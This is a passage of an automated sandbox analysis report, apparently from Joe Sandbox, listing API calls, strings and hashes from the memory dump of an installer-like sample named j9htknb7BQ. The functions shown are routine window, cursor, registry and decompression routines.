                                                                          • TranslateMessage.USER32(?), ref: 004565AB
                                                                          • DispatchMessageA.USER32(?), ref: 004565B4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message$TextWindow$A15940CurrentDispatchSendThreadTranslate
                                                                          • String ID: [Paused]
                                                                          • API String ID: 1715372110-4230553315
                                                                          • Opcode ID: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                          • Instruction ID: b21e1f9e90a9f2d36a55999f4aec8319d50e535270b7c0faa20aeab8e88a7384
                                                                          • Opcode Fuzzy Hash: dc734b73e23721f0060ca7094c6900a610c91b21ae2acdfdba29acc3faa202e8
                                                                          • Instruction Fuzzy Hash: 9B310B70904248AEDB01DBB5DC41BCE7BB8EB0D314F95407BF800E3296D67C9909CBA9
                                                                          APIs
                                                                          • GetCursor.USER32(00000000,0046A767), ref: 0046A6E4
                                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 0046A6F2
                                                                          • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046A767), ref: 0046A6F8
                                                                          • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A702
                                                                          • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046A767), ref: 0046A708
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$LoadSleep
                                                                          • String ID: CheckPassword
                                                                          • API String ID: 4023313301-1302249611
                                                                          • Opcode ID: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                          • Instruction ID: 8e453c91c0c590c9759b614a584e43fa839bbbc5a3d1c7197c153ffb71e3d1f4
                                                                          • Opcode Fuzzy Hash: 0cd4e794cb0659d1b4c7be91935d04c2b5f54db07be9f479e0bdba40b14c3856
                                                                          • Instruction Fuzzy Hash: 36319334640604AFD711EB69C989F9E7BE0EF05305F5580B6F844AB3A2D778EE00CB5A
                                                                          APIs
                                                                            • Part of subcall function 0047663C: GetWindowThreadProcessId.USER32(00000000), ref: 00476644
                                                                            • Part of subcall function 0047663C: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,0047673B,0049B050,00000000), ref: 00476657
                                                                            • Part of subcall function 0047663C: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0047665D
                                                                          • SendMessageA.USER32(00000000,0000004A,00000000,00476ACE), ref: 00476749
                                                                          • GetTickCount.KERNEL32 ref: 0047678E
                                                                          • GetTickCount.KERNEL32 ref: 00476798
                                                                          • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004767ED
                                                                          Strings
                                                                          • CallSpawnServer: Unexpected status: %d, xrefs: 004767D6
                                                                          • CallSpawnServer: Unexpected response: $%x, xrefs: 0047677E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                          • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                          • API String ID: 613034392-3771334282
                                                                          • Opcode ID: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                          • Instruction ID: 71a83a78c23d55d33e7515897efa00ecebce1ccd6bd4cc0fbedfc923aec738ff
                                                                          • Opcode Fuzzy Hash: aa8cf3b1ca808e1997025c551cec6cc8e4be10c38fa863c1333764af79a3be99
                                                                          • Instruction Fuzzy Hash: 7831C074F006149ADB10EBB9C8827EEB3E29F04304F91843BB548EB382D67C8D018B9D
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 00458F5F
                                                                          Strings
                                                                          • .NET Framework CreateAssemblyCache function failed, xrefs: 00458F82
                                                                          • Fusion.dll, xrefs: 00458EFF
                                                                          • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 00458F6A
                                                                          • Failed to load .NET Framework DLL "%s", xrefs: 00458F44
                                                                          • CreateAssemblyCache, xrefs: 00458F56
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                          • API String ID: 190572456-3990135632
                                                                          • Opcode ID: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                          • Instruction ID: b0fae5d47ad60a87b9f111cdb81e12311f6487f55351a3ce1c195c50c1487ae5
                                                                          • Opcode Fuzzy Hash: e7405bef0de90a1b20b21130be7ac328c98422d0360e923e9ad54989aa78f0ae
                                                                          • Instruction Fuzzy Hash: 31317971E00605ABCB00DFA5C88169EB7B5AF48315F50857FE814F7382DF7899098799
                                                                          APIs
                                                                            • Part of subcall function 0041C058: GetObjectA.GDI32(?,00000018), ref: 0041C065
                                                                          • GetFocus.USER32 ref: 0041C178
                                                                          • 73A0A570.USER32(?), ref: 0041C184
                                                                          • 73A08830.GDI32(?,?,00000000,00000000,0041C203,?,?), ref: 0041C1A5
                                                                          • 73A022A0.GDI32(?,?,?,00000000,00000000,0041C203,?,?), ref: 0041C1B1
                                                                          • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1C8
                                                                          • 73A08830.GDI32(?,00000000,00000000,0041C20A,?,?), ref: 0041C1F0
                                                                          • 73A0A480.USER32(?,?,0041C20A,?,?), ref: 0041C1FD
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: A08830$A022A480A570BitsFocusObject
                                                                          • String ID:
                                                                          • API String ID: 1424713005-0
                                                                          • Opcode ID: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                          • Instruction ID: a51b9c7cee13939b32e911f1849152ebfa7eb0d73570b73294f05c7218cf190f
                                                                          • Opcode Fuzzy Hash: 6a39f5637e621883ca0517ce44c3b694a92d9286788943b8a56663a62e87c7eb
                                                                          • Instruction Fuzzy Hash: A0116A71E40609BBDB10DBE9CC85FAFBBFCEF48700F54446AB518E7281D67899008B28
                                                                          APIs
                                                                          • GetSystemMetrics.USER32(0000000E), ref: 00418C80
                                                                          • GetSystemMetrics.USER32(0000000D), ref: 00418C88
                                                                          • 6F522980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C8E
                                                                            • Part of subcall function 004099C0: 6F51C400.COMCTL32(0049A628,000000FF,00000000,00418CBC,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099C4
                                                                          • 6F58CB00.COMCTL32(0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CDE
                                                                          • 6F58C740.COMCTL32(00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CE9
                                                                          • 6F58CB00.COMCTL32(0049A628,00000001,?,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000), ref: 00418CFC
                                                                          • 6F520860.COMCTL32(0049A628,00418D1F,?,00000000,?,0049A628,00000000,00000000,00000000,00000000,00418D18,?,00000000,0000000D,00000000,0000000E), ref: 00418D12
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MetricsSystem$C400C740F520860F522980
                                                                          • String ID:
                                                                          • API String ID: 2856677924-0
                                                                          • Opcode ID: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                          • Instruction ID: 436211bc77980f3f3c6a2ba6eafd8e316937a2835f40b04245610037118c4977
                                                                          • Opcode Fuzzy Hash: 77375f6f841bd32482ac362321ef56034a1adac8671eb50e5d38b587b56b4f6d
                                                                          • Instruction Fuzzy Hash: FB1149B1744204BBDB10EBA9DC83F5E73B8DB48704F6044BABA04E72D2DA799D409759
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,00482098), ref: 0048207D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseOpen
                                                                          • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                          • API String ID: 47109696-2530820420
                                                                          • Opcode ID: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                          • Instruction ID: 2fd02ba07ad27dcdf7cb645fdb5409a97311ae270af1ac1656c6f1dc0261d506
                                                                          • Opcode Fuzzy Hash: 3270de2230ad746d97d59dd4353e0cd3c44e793d3e1148cc667fa9374d6162f5
                                                                          • Instruction Fuzzy Hash: 4911D030604208AADB10F6A29E02B5F7AA8DB42354F508877AA01E7292E7BE8D45D75D
                                                                          APIs
                                                                          • SelectObject.GDI32(00000000,?), ref: 0041B480
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B48F
                                                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4BB
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B4C9
                                                                          • SelectObject.GDI32(?,00000000), ref: 0041B4D7
                                                                          • DeleteDC.GDI32(00000000), ref: 0041B4E0
                                                                          • DeleteDC.GDI32(?), ref: 0041B4E9
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ObjectSelect$Delete$Stretch
                                                                          • String ID:
                                                                          • API String ID: 1458357782-0
                                                                          • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                          • Instruction ID: 28529174ed8a1a36c66279ad8c479dcd7ed434ba0fbaa502c63cdd0cc078bbc5
                                                                          • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                          • Instruction Fuzzy Hash: A1114C72E40559ABDF10D6D9D885FAFB3BCEF08704F048456B614FB241C678A8418B54
                                                                          APIs
                                                                          • 73A0A570.USER32(00000000,?,?,00000000), ref: 00493979
                                                                            • Part of subcall function 0041A1F8: CreateFontIndirectA.GDI32(?), ref: 0041A2B7
                                                                          • SelectObject.GDI32(00000000,00000000), ref: 0049399B
                                                                          • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00493F19), ref: 004939AF
                                                                          • GetTextMetricsA.GDI32(00000000,?), ref: 004939D1
                                                                          • 73A0A480.USER32(00000000,00000000,004939FB,004939F4,?,00000000,?,?,00000000), ref: 004939EE
                                                                          Strings
                                                                          • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 004939A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                          • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                          • API String ID: 1435929781-222967699
                                                                          • Opcode ID: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                          • Instruction ID: ca21cbf5bcaba7d36ec51d0fe3022430e72f204859a7c427f36f75f4196156c5
                                                                          • Opcode Fuzzy Hash: 4da94c4e869f50116a306e6e5405a5310ab38c3bec03186d5db38c66856040fc
                                                                          • Instruction Fuzzy Hash: B30165B6644644AFDB00DFA9CC42F6FB7ECDB49704F514476B504E7281D6789E008B24
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 004233BF
                                                                          • WindowFromPoint.USER32(?,?), ref: 004233CC
                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233DA
                                                                          • GetCurrentThreadId.KERNEL32 ref: 004233E1
                                                                          • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233FA
                                                                          • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 00423411
                                                                          • SetCursor.USER32(00000000), ref: 00423423
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                          • String ID:
                                                                          • API String ID: 1770779139-0
                                                                          • Opcode ID: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                          • Instruction ID: 219e0d69ac6b6a38dcb61baa39fbc914f783b163521ae56cddb293ea60412e1c
                                                                          • Opcode Fuzzy Hash: 5751e80311b49702528c8fc5ff8f7f3a6fa30eb8cde205135d5a5ff58115ab5c
                                                                          • Instruction Fuzzy Hash: E601D42230472036D6217B795C86E2F26A8CFC5B15F50457FB649BB283DA3D8C0063BD
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0049379C
                                                                          • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 004937A9
                                                                          • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 004937B6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModule
                                                                          • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                          • API String ID: 667068680-2254406584
                                                                          • Opcode ID: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                          • Instruction ID: addf7fefb297577c5f12cb6f7e4bbe149f94bc2dbc72dea36d33d0c0dd90845d
                                                                          • Opcode Fuzzy Hash: bc243d748a11952884276210872aa95fdf32b4a39955ab03d8a14887b4b54015
                                                                          • Instruction Fuzzy Hash: 74F0F6D274171467DA2069F60C82F7BAACCDB93762F148077BD05A7382E99D8E0542FE
                                                                          APIs
                                                                          • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457220
                                                                          • GetExitCodeProcess.KERNEL32(?,lI), ref: 00457241
                                                                          • CloseHandle.KERNEL32(?,00457274,?,?,00457A8F,00000000,00000000), ref: 00457267
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                          • String ID: lI$GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                          • API String ID: 2573145106-911929905
                                                                          • Opcode ID: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                          • Instruction ID: 5860e754879763acac88ff1443aad6da1c0af202f9247d34d09c584a8b2c0160
                                                                          • Opcode Fuzzy Hash: 57667e993de5712369b0a272a04b55a8846431b558e145026f984518073022b0
                                                                          • Instruction Fuzzy Hash: 7501A234608204AFDF20EB999D42E1A73E8EB4A714F2041F7F810D73D2DA7C9D04D658
                                                                          APIs
                                                                          • GetProcAddress.KERNEL32(02300000,BZ2_bzDecompressInit), ref: 0045CDB1
                                                                          • GetProcAddress.KERNEL32(02300000,BZ2_bzDecompress), ref: 0045CDC1
                                                                          • GetProcAddress.KERNEL32(02300000,BZ2_bzDecompressEnd), ref: 0045CDD1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc
                                                                          • String ID: BZ2_bzDecompress$BZ2_bzDecompressEnd$BZ2_bzDecompressInit
                                                                          • API String ID: 190572456-212574377
                                                                          • Opcode ID: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                          • Instruction ID: 1838bd6a3fc69983aea635b8e0361122e28d55063b6a1ad71f1ff2e1482e7c5d
                                                                          • Opcode Fuzzy Hash: 4e25438f18f14d5aa4b9246e441ecaa421a620dab92095c903eafcbbb7267c35
                                                                          • Instruction Fuzzy Hash: 86F0A9B05007009FDB24DB26BEC67272AA7E7A4746F14843BD819A6263F77C045DCA5C
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,0047F8E7), ref: 0042E8A9
                                                                          • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E8AF
                                                                          • InterlockedExchange.KERNEL32(0049A668,00000001), ref: 0042E8C0
                                                                            • Part of subcall function 0042E820: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042E8E4,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E836
                                                                            • Part of subcall function 0042E820: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E83C
                                                                            • Part of subcall function 0042E820: InterlockedExchange.KERNEL32(0049A660,00000001), ref: 0042E84D
                                                                          • ChangeWindowMessageFilterEx.USER32(00000000,?,00000001,00000000,00000004,00498934,004563E9,0045678C,00456340,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E8D4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressExchangeHandleInterlockedModuleProc$ChangeFilterMessageWindow
                                                                          • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                          • API String ID: 142928637-2676053874
                                                                          • Opcode ID: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                          • Instruction ID: c365c5bc722f159dc4e6bf90002f67a18111edd1cc3b7a2fef3254202be3c5aa
                                                                          • Opcode Fuzzy Hash: 92209b350bfe604f61bd1406e785eba3252aab3c9a25e474ddb7b579c04d4a00
                                                                          • Instruction Fuzzy Hash: 02E092A1341720AAEB1077B77C8AF9A2258CB11729F5C4037F180A61D2C6BD0C90CE9E
                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,004970E3), ref: 004776CE
                                                                          • GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 004776DB
                                                                          • GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 004776EB
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
